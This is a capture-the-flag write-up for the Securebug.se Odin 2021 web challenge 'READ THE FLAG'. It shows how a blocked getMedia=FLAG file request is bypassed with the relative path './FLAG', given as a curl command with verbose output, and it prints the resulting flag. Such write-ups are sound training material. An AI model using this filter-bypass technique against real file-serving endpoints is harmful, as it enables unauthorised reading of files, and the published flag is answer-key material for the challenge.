Securebug.se CTF Odin 2021: READ THE FLAG

READ THE FLAG

Category: Web security

100 points

Cannot we store them in a database !?

Challenge Link: https://ch2.sbug.se/

Solution

Under the challenge address there are few words from the author ;-)

web

But in closer look I’ve realized that I’ve been redirected from the original address.

I’ve investigated the redirection path, which looks like below.

https://ch2.sbug.se/ => https://ch2.sbug.se/get?getMedia=README => https://ch2.sbug.se/read

The /get?getMedia=README response setups below cookie:

< set-cookie: content="H3llo\012This is my resume.\012I am EXPERT in cyber security\012"; Path=/

which after redirection is displayed under the /read address.

I’ve played a bit with it until I’ve found that https://ch2.sbug.se/get?getMedia=FLAG responds with YOU CANNOT GET A FLAG THAT EASY message. That’s why I’ve tried below:

curl 'https://ch2.sbug.se/get?getMedia=./FLAG' -v
*   Trying 172.67.202.196:443...
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
*  subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
*  start date: Mar  8 00:00:00 2021 GMT
*  expire date: Mar  7 23:59:59 2022 GMT
*  subjectAltName: host "ch2.sbug.se" matched cert's "*.sbug.se"
*  issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
> 
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302 
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=
.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content="SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012"; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
< report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1J
YOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D"}],"max_age":604800,"group":"cf-nel"}
< nel: {"report_to":"cf-nel","max_age":604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

Flag

SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}

Privacy Policy
luc © 2021